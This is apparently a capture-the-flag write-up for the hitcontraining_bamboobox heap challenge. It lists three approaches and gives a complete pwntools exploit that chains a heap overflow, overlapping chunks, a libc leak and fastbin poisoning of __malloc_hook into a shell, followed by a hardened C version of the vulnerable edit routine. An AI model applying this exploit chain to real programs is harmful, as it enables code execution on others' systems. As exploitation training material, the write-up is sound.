
BUU PWN hitcontraining_bamboobox

  I originally set out to practise house of force, but ended up solving the challenge without it... In the end I worked through three different methods for this problem.

  1. fastbins attack

  2. unlink

  3. house of force

  The GOT can be overwritten, and the program's edit function allows a heap overflow.

fastbins attack

  Use the overflow to rewrite a size field and build overlapping chunks, leak libc, overwrite an fd pointer, use realloc to adjust the stack frame, and hit __malloc_hook to get a shell. Standard procedure, so the exp is pasted directly below.

from pwn import *

p = process('./pwn')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

def duan():
    # attach gdb and pause; debugging helper only
    gdb.attach(p)
    pause()

def add(size, content):
    p.sendlineafter('choice:', '2')
    p.sendlineafter('name:', str(size))
    p.sendafter('item:', content)

def show():
    p.sendlineafter('choice:', '1')

def edit(index, size, content):
    # the size given here is not checked against the original allocation
    p.sendlineafter('choice:', '3')
    p.sendlineafter('item:', str(index))
    p.sendlineafter('name:', str(size))
    p.sendafter('item:', content)

def delete(index):
    p.sendlineafter('choice:', '4')
    p.sendlineafter('item:', str(index))

# one_gadget offsets for this libc
og = [0x45226, 0x4527a, 0xf0364, 0xf1207]

add(0x20, 'aaaaaaaa')
add(0x20, 'bbbbbbbb')
add(0x60, 'cccccccc')
add(0x10, 'cccccccc')

# overflow from item 0 into item 1's size field (0x30 -> 0xa1), so item 1 now
# overlaps items 2 and 3; freeing it puts it in the unsorted bin
edit(0, 0x30, 'a'*0x20 + p64(0) + p64(0xa1))
delete(1)
add(0x20, 'aaaaaaaa')
show()
# the remainder's fd/bk point into main_arena, which gives the libc base
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88 - 0x10 - libc.symbols['__malloc_hook']
malloc_hook = libc_base + libc.symbols['__malloc_hook']
realloc = libc_base + libc.symbols['realloc']
print 'libc_base-->' + hex(libc_base)
print 'malloc_hook-->' + hex(malloc_hook)
shell = libc_base + og[3]

# fastbin attack: free a 0x70 chunk that overlaps item 2, then rewrite its fd
# through item 2 to point just before __malloc_hook
add(0x60, 'bbbbbbbb')
delete(4)
edit(2, 0x10, p64(malloc_hook - 0x23))
add(0x60, 'aaaaaaaa')
# the second allocation lands on the fake chunk: __realloc_hook = one_gadget,
# __malloc_hook = realloc+20 so the stack is adjusted before the gadget runs
add(0x60, 'a'*(0x13-0x8) + p64(shell) + p64(realloc + 20))
p.sendlineafter('choice:', '2')
p.sendlineafter('name:', str(0x10))
p.interactive()
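All three methods start from the same root cause: edit accepts a new length without comparing it to the item's original allocation. The following is an added example, not the challenge binary or the author's code: a minimal model of the item table in which add records the allocation size and edit refuses anything larger, so the edit(0, 0x30, ...) write on a 0x20-byte item that the exp relies on is rejected before it reaches the next chunk's size field. The names item, add_item, edit_item, delete_item and MAX_ITEMS are assumptions.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ITEMS 16

/* Each slot records its allocation size; the box's own edit never consults it. */
struct item {
    size_t cap;
    char  *buf;
};

static struct item items[MAX_ITEMS];

/* add: allocate exactly 'size' bytes in the first free slot; returns the index or -1. */
int add_item(size_t size, const char *content, size_t len)
{
    if (size == 0 || len > size) return -1;
    for (int i = 0; i < MAX_ITEMS; i++) {
        if (items[i].buf) continue;
        items[i].buf = calloc(1, size);
        if (!items[i].buf) return -1;
        memcpy(items[i].buf, content, len);
        items[i].cap = size;
        return i;
    }
    return -1;
}

/* edit, hardened: a length above the recorded capacity is refused, so
 * edit(0, 0x30, ...) on a 0x20-byte item cannot reach the next chunk's size field. */
int edit_item(int idx, size_t newlen, const char *content)
{
    if (idx < 0 || idx >= MAX_ITEMS || !items[idx].buf) return -1;
    if (newlen > items[idx].cap) return -1;
    memcpy(items[idx].buf, content, newlen);
    return 0;
}

/* delete: free and clear the slot so a freed index can no longer be edited. */
int delete_item(int idx)
{
    if (idx < 0 || idx >= MAX_ITEMS || !items[idx].buf) return -1;
    free(items[idx].buf);
    items[idx].buf = NULL;
    items[idx].cap = 0;
    return 0;
}
```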